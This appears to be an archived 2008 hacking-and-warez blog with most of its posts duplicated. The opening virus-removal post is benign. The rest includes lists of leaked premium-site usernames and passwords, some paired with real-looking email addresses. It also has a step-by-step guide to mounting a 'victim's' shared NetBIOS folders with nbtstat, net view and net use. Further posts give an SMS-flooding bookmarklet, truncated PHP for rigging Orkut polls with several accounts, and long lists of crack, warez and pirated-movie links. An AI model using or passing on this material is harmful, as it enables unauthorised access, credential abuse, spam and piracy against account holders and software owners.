Orkut is banned you fool
2 Nov, 2007 Tutorials
So Are you getting this error message
“Orkut is banned you fool,the administrator didn’t write this programme guess who did ? muhahaha”
white opening ORKUT
You must be getting the similar message for Youtube and Firefox
Youtube :
“Youtube is banned you fool,the administrator didn’t write this programme guess who did ? muhahaha”
Firefox :
“Firefox is banned you fool,the administrator didn’t write this programme guess who did ? muhahaha”
Here is the solution for this problem
Actually you are infected with an virus .DONT PANIC ! Just follow the procedure given below
1. Press CTRL+ALT+DEL and go to the processes tab
2. Look for svchost.exe under the image name. There will be many but look for the ones which have your username under the username
3. Press DEL to kill these files. It will give you a warning, Press Yes
4. Repeat for more svchost.exe files with your username and repeat. Do not kill svchost.exe with system, local service or network service!
5. Now open My Computer
6. In the address bar, type “C:\heap41a” and press enter
7. Delete all the files here
8. Now go to start -> Run and type “Regedit”
9. Go to the menu EDIT –> FIND
10. Type “heap41a” here and press enter
11. You will get something like this “[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt
”
12. Press DEL. It will ask “Are you sure you want to delete this value”, click “Yes”
13. Now close the registry editor
And format your USB drives .It may still have the infection .When you double click a pendrive icon in my computer the “autorun.ini” executes and virus copied in your PC
Also scan your full PC with an good antivirus
Sunday, June 29, 2008
Wednesday, June 25, 2008
Premium Accounts For Premium Sites
http://www.fullreleasez.com/(like www.fulldownloads.us)
Username: Af872HskL
Password: XjsdH28N
+++++++++++++++++++++++++++++++++
warezquality.com
ageg2020:z8fsDfg3
+++++++++++++++++++++++++++++++++
warezreleases.com
HnRPxKQz:a59KBV7
a25bipZP:1TeVnoJb
+++++++++++++++++++++++++++++++++
pirateaccess.com
h4gpOM:Ca0i25
9kHYkgmGHD
P2izn5:T7y1UY
tWxWTe:0yjFEX
MQSUjv:lFj6g6
eEz0ex:61ZoYl
h4gpOM:Ca0i25
e2ZTjs:zqObNO
yourfrienddalat@gmail.com:CHh5LKPI
xxx_heel_xxx@yahoo.com:MJY0BUY
i_l0ve_u_786@yahoo.com:rYvLgPrt
+++++++++++++++++++++++++++++++++
http://fulldownloadaccess.com
username = mpuv3y
password= umvpy3x
+++++++++++++++++++++++++++++++++
http://www.fullreleases.com/members/
Username: www.vaun@gmail.com
Password: ****private
Username: bibibobo@temporaryinbox.com
Password: 3YX55H
+++++++++++++++++++++++++++++++++
downloadprofessional.com
Username: lo886Ees
Password: zAgt88er
+++++++++++++++++++++++++++++++++
http://www.sharingzone.net/
Username: LODMQYHX
Password: 375021402
Receipt: 4T5W89RD
+++++++++++++++++++++++++++++++++
megadownloadpass.com
name: Stephen
pass: Stephen08
+++++++++++++++++++++++++++++++++
http://unlimitedgamedownloads.com/
Your username: ga20me
Your password: ke01feb
+++++++++++++++++++++++++++++++++
[content suppressed]
username: avi-3981330-19e
password: B84229CD
username: avi-3881101-9e3
password: B430AB40
username: avi-3808936-3bb
password: 16236E4E
username: avi-3686971-a80
password: 0DC429DF
username: avi-3536172-ee9
password: 590DA35B
username: avi-2889635-4f5
password: E3324AA1
username: avi-3736818-c07
password: A5A532AD
username: avi-3098119-5f6
password: B2B0E022
username: avi-3736649-bb3
password: 7FF8FDC1
username: avi-3726478-4cb
password: 21511A26
username: avi-3533688-498
password: 0F079C04
http://alphaload.com/customers/index.html
Ihr Login-Name : AL3429268
Ihr Passwort : AAAWsgKz
Ihr Login-Name : AL3429290
Ihr Passwort : ZwWAeTwg
Ihr Login-Name : AL3429273
Ihr Passwort : PNTKYKCP
Ihr Login-Name : AL3429286
Ihr Passwort : SxxWZRNX
Ihr Login-Name : AL3429270
Ihr Passwort : YgYxRyzT
Ihr Login-Name : AL3429272
Ihr Passwort : CTMXHWMW
Ihr Login-Name : AL3429286
Ihr Passwort : SxxWZRNX
Ihr Login-Name : AL3429290
Ihr Passwort : ZwWAeTwg
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Ihr Login-Name : AL3429286
Ihr Passwort : SxxWZRNX
Ihr Login-Name : AL3429290
Ihr Passwort : ZwWAeTwg
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Username: Af872HskL
Password: XjsdH28N
+++++++++++++++++++++++++++++++++
warezquality.com
ageg2020:z8fsDfg3
+++++++++++++++++++++++++++++++++
warezreleases.com
HnRPxKQz:a59KBV7
a25bipZP:1TeVnoJb
+++++++++++++++++++++++++++++++++
pirateaccess.com
h4gpOM:Ca0i25
9kHYkgmGHD
P2izn5:T7y1UY
tWxWTe:0yjFEX
MQSUjv:lFj6g6
eEz0ex:61ZoYl
h4gpOM:Ca0i25
e2ZTjs:zqObNO
yourfrienddalat@gmail.com:CHh5LKPI
xxx_heel_xxx@yahoo.com:MJY0BUY
i_l0ve_u_786@yahoo.com:rYvLgPrt
+++++++++++++++++++++++++++++++++
http://fulldownloadaccess.com
username = mpuv3y
password= umvpy3x
+++++++++++++++++++++++++++++++++
http://www.fullreleases.com/members/
Username: www.vaun@gmail.com
Password: ****private
Username: bibibobo@temporaryinbox.com
Password: 3YX55H
+++++++++++++++++++++++++++++++++
downloadprofessional.com
Username: lo886Ees
Password: zAgt88er
+++++++++++++++++++++++++++++++++
http://www.sharingzone.net/
Username: LODMQYHX
Password: 375021402
Receipt: 4T5W89RD
+++++++++++++++++++++++++++++++++
megadownloadpass.com
name: Stephen
pass: Stephen08
+++++++++++++++++++++++++++++++++
http://unlimitedgamedownloads.com/
Your username: ga20me
Your password: ke01feb
+++++++++++++++++++++++++++++++++
[content suppressed]
username: avi-3981330-19e
password: B84229CD
username: avi-3881101-9e3
password: B430AB40
username: avi-3808936-3bb
password: 16236E4E
username: avi-3686971-a80
password: 0DC429DF
username: avi-3536172-ee9
password: 590DA35B
username: avi-2889635-4f5
password: E3324AA1
username: avi-3736818-c07
password: A5A532AD
username: avi-3098119-5f6
password: B2B0E022
username: avi-3736649-bb3
password: 7FF8FDC1
username: avi-3726478-4cb
password: 21511A26
username: avi-3533688-498
password: 0F079C04
http://alphaload.com/customers/index.html
Ihr Login-Name : AL3429268
Ihr Passwort : AAAWsgKz
Ihr Login-Name : AL3429290
Ihr Passwort : ZwWAeTwg
Ihr Login-Name : AL3429273
Ihr Passwort : PNTKYKCP
Ihr Login-Name : AL3429286
Ihr Passwort : SxxWZRNX
Ihr Login-Name : AL3429270
Ihr Passwort : YgYxRyzT
Ihr Login-Name : AL3429272
Ihr Passwort : CTMXHWMW
Ihr Login-Name : AL3429286
Ihr Passwort : SxxWZRNX
Ihr Login-Name : AL3429290
Ihr Passwort : ZwWAeTwg
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Ihr Login-Name : AL3429286
Ihr Passwort : SxxWZRNX
Ihr Login-Name : AL3429290
Ihr Passwort : ZwWAeTwg
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Ihr Login-Name : AL3429350
Ihr Passwort : gMZNFcyS
Ihr Login-Name : AL3429351
Ihr Passwort : cTAkWAxc
Ihr Login-Name : AL3429352
Ihr Passwort : ykbcKTNS
Ihr Login-Name : AL3429355
Ihr Passwort : RCHAbhKM
Tuesday, June 24, 2008
[Download]]Huge Collection Of Documentaries Movies
More than 140 Documentary Films High Quality and Every Links are Direct Links
Don't Miss It
911 - Confronting The Evidence
911 - The Great Deception
911 - The Greatest Lie Ever Sold
911 Birth of Treason
911 Mysteries
911 Myths - David Ray Griffin
911 Press for Truth
911 Revisited v2
AFTF Authorized
Aerosol Crimes
Aftermath Live Panel
Aftermath: Unanswered Questions of 9-11
Aldoux Huxley - The Gravity of Light
Alex Jones Documentary Films
Alliance Weather Underground
Alternative 3 (Sequel to Iron Mountian)
America Freedom to Fascism
America's Disgrace Exposed
Angels Dont Play This HAARP
Anthrax Investigation
Aspertame - Sweet Misery - A Poisoned World
BBC Documentaries
Bad Trip To Edgewood
Banking With Hitler
Beyond Treason
Brainwashing: 101
Charlotte Iserbyt - The Deliberate Dumbing Down of America
Chavez - The Revolution Will Not Be Televised
Cointelpro
Conspiracy of Silence
Convoy of Death
Corporation
Crazy Rulers of the World (Nov 2004)
DRG Cspan2 - Very Good
David Cole At Auschwitz Nazi Jew Revisionism
Day 51 - The True Story Of Waco
Discovery Science - Owning The Weather
Dreamworlds 2 - Desire Sex and Power in Music Video
Echelon - The Most Secret Spy System
Election Hacking: Clinton Curtis Testimony Ohio 2004
Everbody's Gotta Learn Sometime
Exposed: The Carlyle Group
Exposing The Illuminati From Within
Fallujah: The Hidden M***acre
Fluoride Deception
Freemasonry - From Darkness To Light
Freemasonry Revealed
Frontline
Future Of Food: Genetically Modified Food
G. Edward Griffin
Gladio
Gulag USA: Concentration Camps In America
HAARP: Holes in Heaven
Hidden Wars of Desert Storm
Hijack Catastrophe Extras
Hijacking Catastrophe
History Documentary - The Rockefellers
In Search Of The American Drug Lords
Inside The Oklahoma City Grand Jury
Invisible Ballots
Iraq Death Squads
Iraq For Sale
Iron Mountain: Blueprint for Tyranny
Download :
http://91.121.24.223/files/Documentaries/
Don't Miss It
911 - Confronting The Evidence
911 - The Great Deception
911 - The Greatest Lie Ever Sold
911 Birth of Treason
911 Mysteries
911 Myths - David Ray Griffin
911 Press for Truth
911 Revisited v2
AFTF Authorized
Aerosol Crimes
Aftermath Live Panel
Aftermath: Unanswered Questions of 9-11
Aldoux Huxley - The Gravity of Light
Alex Jones Documentary Films
Alliance Weather Underground
Alternative 3 (Sequel to Iron Mountian)
America Freedom to Fascism
America's Disgrace Exposed
Angels Dont Play This HAARP
Anthrax Investigation
Aspertame - Sweet Misery - A Poisoned World
BBC Documentaries
Bad Trip To Edgewood
Banking With Hitler
Beyond Treason
Brainwashing: 101
Charlotte Iserbyt - The Deliberate Dumbing Down of America
Chavez - The Revolution Will Not Be Televised
Cointelpro
Conspiracy of Silence
Convoy of Death
Corporation
Crazy Rulers of the World (Nov 2004)
DRG Cspan2 - Very Good
David Cole At Auschwitz Nazi Jew Revisionism
Day 51 - The True Story Of Waco
Discovery Science - Owning The Weather
Dreamworlds 2 - Desire Sex and Power in Music Video
Echelon - The Most Secret Spy System
Election Hacking: Clinton Curtis Testimony Ohio 2004
Everbody's Gotta Learn Sometime
Exposed: The Carlyle Group
Exposing The Illuminati From Within
Fallujah: The Hidden M***acre
Fluoride Deception
Freemasonry - From Darkness To Light
Freemasonry Revealed
Frontline
Future Of Food: Genetically Modified Food
G. Edward Griffin
Gladio
Gulag USA: Concentration Camps In America
HAARP: Holes in Heaven
Hidden Wars of Desert Storm
Hijack Catastrophe Extras
Hijacking Catastrophe
History Documentary - The Rockefellers
In Search Of The American Drug Lords
Inside The Oklahoma City Grand Jury
Invisible Ballots
Iraq Death Squads
Iraq For Sale
Iron Mountain: Blueprint for Tyranny
Download :
http://91.121.24.223/files/Documentaries/
[1337]exploit victim in 15sec
If your victim posess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : -
Click "Start -> Run -> cmd"
Type the following at the Dos Prompt
Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]
This will give you a read out that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Net view \\
[e.g : net view \\207.175.1.1]
You will then get a response that looks something like this.
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)
This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.
Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.
This is how : -
Click "Start -> Run -> cmd"
Type the following at the Dos Prompt
Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]
This will give you a read out that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Net view \\
[e.g : net view \\207.175.1.1]
You will then get a response that looks something like this.
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)
This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.
Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.
Sunday, June 22, 2008
[link]
Clean Warez Links:
http://kickme.to/siana
http://www.khidmat.info/fileupload
http://kickme.to/yaplukon
http://www.iskushenie.ru/
http://kadets.ru/
http://~censored~/
http://sh-soft.h11.ru/
http://www.qpxqp.com/
http://www.nrg.to/joed
http://flashvn.blogsky.com/
ftp://209.13.135.66/sur/VARIOS
http://nhjm.net/~flasharena/html/index.php
http://home.wanadoo.nl/fullsoft/nieuw.htm
http://usefull1.tripod.com/
http://www.e-lunatic.org/
http://www.vanix.net/index.php
http://www.soft-best.net/
http://softobzor.net/
http://www.wheredown.com/
http://www.bsoft.ru/index.php
http://www.9down.com/index.php
http://www.r3mteam.org/index.php
Direct crack DOWNLOADS For Popular Programs Only:
http://cs.co.ru/
http://bladez1999.cjb.net/
http://mp2k.host.sk/release.htm
http://www.salusoft.com/
http://www.seekndestroy.host.sk/
http://zor.org/tsrh
http://www.kpteam.com/
http://avenger.cvalka.net/index.php?page=main
http://www.anthrax83.fr.tc/
http://revenge.crackdb.com/
NEWEST Releases Of Apps + Fixes:
http://www.9down.com/index.php
http://www.zonapentel.com/index.html
http://www.format.org.ua:8181/news/index.htm
http://www.sonic2k.com/
http://www.thiweb.online.fr/
http://www.wheredown.com/
http://www.xnt.info/category.php?id=2
http://www.vanix.net/index.php
http://wilknet.no-ip.com/
http://www.bsoft.ru/index.php
http://www.e-lunatic.org/
http://megido.ru/
http://soft-best.net/index.php?language=eng
http://softobzor.net/modules.php?name=xNews&pagenum=1
http://kickme.to/siana
http://~censored~/
http://members.brabant.chello.nl/~r.beekelaar/app.htm
http://down.ttdown.com/
http://en.fixdown.com/all_1.htm
Peer 2 Peer:
http://www.neo-modus.com/
http://www.emule-project.net/
http://www.kazaa.com/
http://sharereactor.com/
http://www.edonkey2000.com/
http://dcplusplus.sourceforge.net/
http://www.shareaza.com/
http://www.gnutella.com/
http://www.emuleplus.tk/
http://www.k-lite.tk/
SHAREWARE:
http://www.softpedia.com/
http://www.webattack.com/
http://www.download.com/
http://www.5star-shareware.com/
Miscellaneous Sites:
http://www.wheredown.com/
http://sh-soft.h11.ru/
http://www.appzworld.com/
http://bsoft.ru/index.php
http://www.webosoft.net/
http://flashvn.blogsky.com/
http://lunatic.sharewith.us/
http://kickme.to/themainlist
http://homepage.ntlworld.com/bennett.michael
http://kickme.to/superdisk2
http://www.serialz.to/
http://www.geocities.com/fosi1us
http://www.fosi.up.co.il/
http://dvm0day.blogspot.com/
http://bsoft.ru/
http://kadets.ru/
http://soft-best.net/
http://r3mteam.tk/
http://vanix.tk/
http://webwarez.net/
http://overdays.net/
http://appzplanet.com/
http://www.appzworld.com/
http://~censored~/
http://www.datowarez.info/
http://www.aladown.com/
http://www.gupin.com/
http://fixdown.com/
http://ttdown.com/
http://www.crsky.com/
http://www.crsky.net/
http://www.9down.com/
http://0daycn.net/
http://www.fbstu.com/
http://www.qpxqp.com/
http://fosisoft.home.ro/
http://kickme.to/fosi
http://fosi.ural.net/
http://www.fosiwarez.tk/
http://navig8.to/fosi
http://linkworld.to/fosi
http://leodonaire.tripod.com/
http://www.drsoftware.00page.com/
http://jajco.rezot.co.uk/
http://217.170.18.24/~rappie
http://www.necz.cjb.net/
http://neon.cd/
http://www.warezsector.com/warez-ix
http://www.linkking.org/
http://www.lwteam.ru/
http://wutun.idv.tw/enfor.htm
http://www.songtoday.com/
http://www.grc.com/
http://lnkworld.com/
http://gamecopyworld.com/
http://www.gamefaqs.com/
http://www.templatesearch.com/
http://www.freewebtemplates.com/
http://www.javascriptkit.com/
http://www.cgiscript.net/
http://www.dynamicdrive.com/
http://www.jsmadeeasy.com/
http://www.shorturl.com/
http://www.kickme.to/
http://www.phpbbhacks.com/
http://www.bbfree.com/
http://www.downshow.com/
http://www.fixdown.com/
http://www.ttdown.com/
http://www.cnyou.com/
http://www.soft168.com/
http://www.soft163.com/
http://www.99soft.com/
http://www.jetdown.com/
http://www.1777.netwww.3959.com/
http://www.chinesejia.com/
PIYUSH
http://www.acedown.com/
http://www.loadown.net/
http://soft.269.net/
http://down.51soft.com/soften.asp?softID=1504
http://www.bear5.com/
http://www.caiqing.net/
http://www.101uses.com/
http://stapleton.host.sk/Download/download.htm
http://download.gotonet.com.cn/html_dynamic.asp
http://www.easywarez.com/
http://home.kscable.com/elogic/
http://www.muieri.net/
http://down.tyfo.com/
http://elpa.myetang.com/soft/fyrj.htm
http://soft.jx163.com/
http://www.zj165.com/first.asp
http://www.apps2u.de.vu/
http://www.it.jsol.net/down/
http://61.159.224.200/flash/flashsoft/
http://www.liaokai.com/en/index.htm
http://www.directarchive.tmfweb.nl/
http://www.myitcn.com/jxts/index.htm
http://nerjinsoft.by.ru/softerra.htm
http://newsoft.keepcyber.com/ddl/index.shtml
http://www.pluhh.com/index_ps.htm
http://kickme.to/FOSI
http://www.shockunion.com/shock/software.htm
http://bensboy.home.chinaren.com/
http://www.moneys2008.com/down/eshow.php?sid=351
http://vdown.myrice.com/
http://202.109.129.8/softasp/softas...ass1=5&class2=1
http://www.wtapz.com/a/
http://www.newhua.com/ty_backup.htm
http://soft.km169.net/soft/html/4071.htm
http://download.51soft.com/html/d/desktopx.htm
http://www.bt.nm.cninfo.net/sortware/
http://extend.hk.hi.cn/~czy/
http://vdown.vicp.net/
http://www.yy-china.com/htm/bd_tx.htm
http://fwhp.cjb.net/start.htm?
http://home.wanadoo.nl/montenegro/1.html
top crack si8
TOP crack Sites:
http://www.andr.net/
http://asta-killer.com/
http://astalavista.box.sk/
http://www.astalavista.us/
http://www.cracks.am/
http://www.serials.ws/
http://lomalka.ru/index.en.html
http://cracks.thebugs.ws/
http://got2share.com/ez/appz/list.htm
http://forum.asiaco.com/xsnx
http://www.powow.com/basecipher/find_serials.htm
http://kickme.to/siana
http://www.khidmat.info/fileupload
http://kickme.to/yaplukon
http://www.iskushenie.ru/
http://kadets.ru/
http://~censored~/
http://sh-soft.h11.ru/
http://www.qpxqp.com/
http://www.nrg.to/joed
http://flashvn.blogsky.com/
ftp://209.13.135.66/sur/VARIOS
http://nhjm.net/~flasharena/html/index.php
http://home.wanadoo.nl/fullsoft/nieuw.htm
http://usefull1.tripod.com/
http://www.e-lunatic.org/
http://www.vanix.net/index.php
http://www.soft-best.net/
http://softobzor.net/
http://www.wheredown.com/
http://www.bsoft.ru/index.php
http://www.9down.com/index.php
http://www.r3mteam.org/index.php
Direct crack DOWNLOADS For Popular Programs Only:
http://cs.co.ru/
http://bladez1999.cjb.net/
http://mp2k.host.sk/release.htm
http://www.salusoft.com/
http://www.seekndestroy.host.sk/
http://zor.org/tsrh
http://www.kpteam.com/
http://avenger.cvalka.net/index.php?page=main
http://www.anthrax83.fr.tc/
http://revenge.crackdb.com/
NEWEST Releases Of Apps + Fixes:
http://www.9down.com/index.php
http://www.zonapentel.com/index.html
http://www.format.org.ua:8181/news/index.htm
http://www.sonic2k.com/
http://www.thiweb.online.fr/
http://www.wheredown.com/
http://www.xnt.info/category.php?id=2
http://www.vanix.net/index.php
http://wilknet.no-ip.com/
http://www.bsoft.ru/index.php
http://www.e-lunatic.org/
http://megido.ru/
http://soft-best.net/index.php?language=eng
http://softobzor.net/modules.php?name=xNews&pagenum=1
http://kickme.to/siana
http://~censored~/
http://members.brabant.chello.nl/~r.beekelaar/app.htm
http://down.ttdown.com/
http://en.fixdown.com/all_1.htm
Peer 2 Peer:
http://www.neo-modus.com/
http://www.emule-project.net/
http://www.kazaa.com/
http://sharereactor.com/
http://www.edonkey2000.com/
http://dcplusplus.sourceforge.net/
http://www.shareaza.com/
http://www.gnutella.com/
http://www.emuleplus.tk/
http://www.k-lite.tk/
SHAREWARE:
http://www.softpedia.com/
http://www.webattack.com/
http://www.download.com/
http://www.5star-shareware.com/
Miscellaneous Sites:
http://www.wheredown.com/
http://sh-soft.h11.ru/
http://www.appzworld.com/
http://bsoft.ru/index.php
http://www.webosoft.net/
http://flashvn.blogsky.com/
http://lunatic.sharewith.us/
http://kickme.to/themainlist
http://homepage.ntlworld.com/bennett.michael
http://kickme.to/superdisk2
http://www.serialz.to/
http://www.geocities.com/fosi1us
http://www.fosi.up.co.il/
http://dvm0day.blogspot.com/
http://bsoft.ru/
http://kadets.ru/
http://soft-best.net/
http://r3mteam.tk/
http://vanix.tk/
http://webwarez.net/
http://overdays.net/
http://appzplanet.com/
http://www.appzworld.com/
http://~censored~/
http://www.datowarez.info/
http://www.aladown.com/
http://www.gupin.com/
http://fixdown.com/
http://ttdown.com/
http://www.crsky.com/
http://www.crsky.net/
http://www.9down.com/
http://0daycn.net/
http://www.fbstu.com/
http://www.qpxqp.com/
http://fosisoft.home.ro/
http://kickme.to/fosi
http://fosi.ural.net/
http://www.fosiwarez.tk/
http://navig8.to/fosi
http://linkworld.to/fosi
http://leodonaire.tripod.com/
http://www.drsoftware.00page.com/
http://jajco.rezot.co.uk/
http://217.170.18.24/~rappie
http://www.necz.cjb.net/
http://neon.cd/
http://www.warezsector.com/warez-ix
http://www.linkking.org/
http://www.lwteam.ru/
http://wutun.idv.tw/enfor.htm
http://www.songtoday.com/
http://www.grc.com/
http://lnkworld.com/
http://gamecopyworld.com/
http://www.gamefaqs.com/
http://www.templatesearch.com/
http://www.freewebtemplates.com/
http://www.javascriptkit.com/
http://www.cgiscript.net/
http://www.dynamicdrive.com/
http://www.jsmadeeasy.com/
http://www.shorturl.com/
http://www.kickme.to/
http://www.phpbbhacks.com/
http://www.bbfree.com/
http://www.downshow.com/
http://www.fixdown.com/
http://www.ttdown.com/
http://www.cnyou.com/
http://www.soft168.com/
http://www.soft163.com/
http://www.99soft.com/
http://www.jetdown.com/
http://www.1777.netwww.3959.com/
http://www.chinesejia.com/
PIYUSH
http://www.acedown.com/
http://www.loadown.net/
http://soft.269.net/
http://down.51soft.com/soften.asp?softID=1504
http://www.bear5.com/
http://www.caiqing.net/
http://www.101uses.com/
http://stapleton.host.sk/Download/download.htm
http://download.gotonet.com.cn/html_dynamic.asp
http://www.easywarez.com/
http://home.kscable.com/elogic/
http://www.muieri.net/
http://down.tyfo.com/
http://elpa.myetang.com/soft/fyrj.htm
http://soft.jx163.com/
http://www.zj165.com/first.asp
http://www.apps2u.de.vu/
http://www.it.jsol.net/down/
http://61.159.224.200/flash/flashsoft/
http://www.liaokai.com/en/index.htm
http://www.directarchive.tmfweb.nl/
http://www.myitcn.com/jxts/index.htm
http://nerjinsoft.by.ru/softerra.htm
http://newsoft.keepcyber.com/ddl/index.shtml
http://www.pluhh.com/index_ps.htm
http://kickme.to/FOSI
http://www.shockunion.com/shock/software.htm
http://bensboy.home.chinaren.com/
http://www.moneys2008.com/down/eshow.php?sid=351
http://vdown.myrice.com/
http://202.109.129.8/softasp/softas...ass1=5&class2=1
http://www.wtapz.com/a/
http://www.newhua.com/ty_backup.htm
http://soft.km169.net/soft/html/4071.htm
http://download.51soft.com/html/d/desktopx.htm
http://www.bt.nm.cninfo.net/sortware/
http://extend.hk.hi.cn/~czy/
http://vdown.vicp.net/
http://www.yy-china.com/htm/bd_tx.htm
http://fwhp.cjb.net/start.htm?
http://home.wanadoo.nl/montenegro/1.html
top crack si8
TOP crack Sites:
http://www.andr.net/
http://asta-killer.com/
http://astalavista.box.sk/
http://www.astalavista.us/
http://www.cracks.am/
http://www.serials.ws/
http://lomalka.ru/index.en.html
http://cracks.thebugs.ws/
http://got2share.com/ez/appz/list.htm
http://forum.asiaco.com/xsnx
http://www.powow.com/basecipher/find_serials.htm
[javascript]flood sms
javascript:document.forms[0].elements[1].value=MOBNUMBeR;document.forms[0].elements[2].value=your-messaage;onclick=validatemessage();document.forms[0].elements[6].value='Send SMS Message';voide(0);
from picture get u r url for sending sms!
Bookmark in FF and open myCantos page! Keep clicking on link!!
i fail in making software! as getting scripterror!
Note:: use this service for good work else Mycantos team may implement captach!
from picture get u r url for sending sms!
Bookmark in FF and open myCantos page! Keep clicking on link!!
i fail in making software! as getting scripterror!
Note:: use this service for good work else Mycantos team may implement captach!
[source]poll votor
function MassVote() {
//By Mr xXx
function curl($a,$b,$c,$d,$e){
$ch = curl_init();
curl_setopt_array($ch,
array(
CURLOPT_URL => $a,
CURLOPT_RETURNTRANSFER => $b,
CURLOPT_COOKIE => $c,
CURLOPT_HEADER => $d,
CURLOPT_NOBODY => $d,
CURLOPT_CUSTOMREQUEST => ($e)?"POST":"GET",
CURLOPT_POSTFIELDS => $e
)
);
$g = curl_exec($ch);
curl_close($ch);
return $g;
}
$email = Array(
"email_1@hotmail.com",
"email_2@hotmail.com",
"email_3@hotmail.com");
$senha = Array(
"senha_1",
"senha_2",
"senha_3");
$o = "http://www.orkut.com/";
$g = "https://www.google.com/accounts/ClientLogin?Email=";
$link = $_POST['link_vote'];
$option = $_POST['option'];
$cmm = $_POST['cmm'];
for($i=0;$i
$l = $email[$i];
$p = $senha[$i
//By Mr xXx
function curl($a,$b,$c,$d,$e){
$ch = curl_init();
curl_setopt_array($ch,
array(
CURLOPT_URL => $a,
CURLOPT_RETURNTRANSFER => $b,
CURLOPT_COOKIE => $c,
CURLOPT_HEADER => $d,
CURLOPT_NOBODY => $d,
CURLOPT_CUSTOMREQUEST => ($e)?"POST":"GET",
CURLOPT_POSTFIELDS => $e
)
);
$g = curl_exec($ch);
curl_close($ch);
return $g;
}
$email = Array(
"email_1@hotmail.com",
"email_2@hotmail.com",
"email_3@hotmail.com");
$senha = Array(
"senha_1",
"senha_2",
"senha_3");
$o = "http://www.orkut.com/";
$g = "https://www.google.com/accounts/ClientLogin?Email=";
$link = $_POST['link_vote'];
$option = $_POST['option'];
$cmm = $_POST['cmm'];
for($i=0;$i
$l = $email[$i];
$p = $senha[$i
cheat book 2008
http://rapidshare.com/files/122859410/CheatBook_Database_2008_-_Arif1490.rar.html
http://www.cheatbook.de/
http://www.cheatbook.de/
Saturday, June 21, 2008
AFTER SEX[MOIVE]
http://rapidshare.com/files/92582728/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part1.rar
http://rapidshare.com/files/92600214/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part2.rar
http://rapidshare.com/files/92611404/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part3.rar
http://rapidshare.com/files/92629428/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part4.rar
http://rapidshare.com/files/92640389/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part5.rar
http://rapidshare.com/files/92656070/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part6.rar
http://rapidshare.com/files/92667376/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part7.rar
http://rapidshare.com/files/92671017/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part8.rar
http://rapidshare.com/files/92600214/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part2.rar
http://rapidshare.com/files/92611404/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part3.rar
http://rapidshare.com/files/92629428/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part4.rar
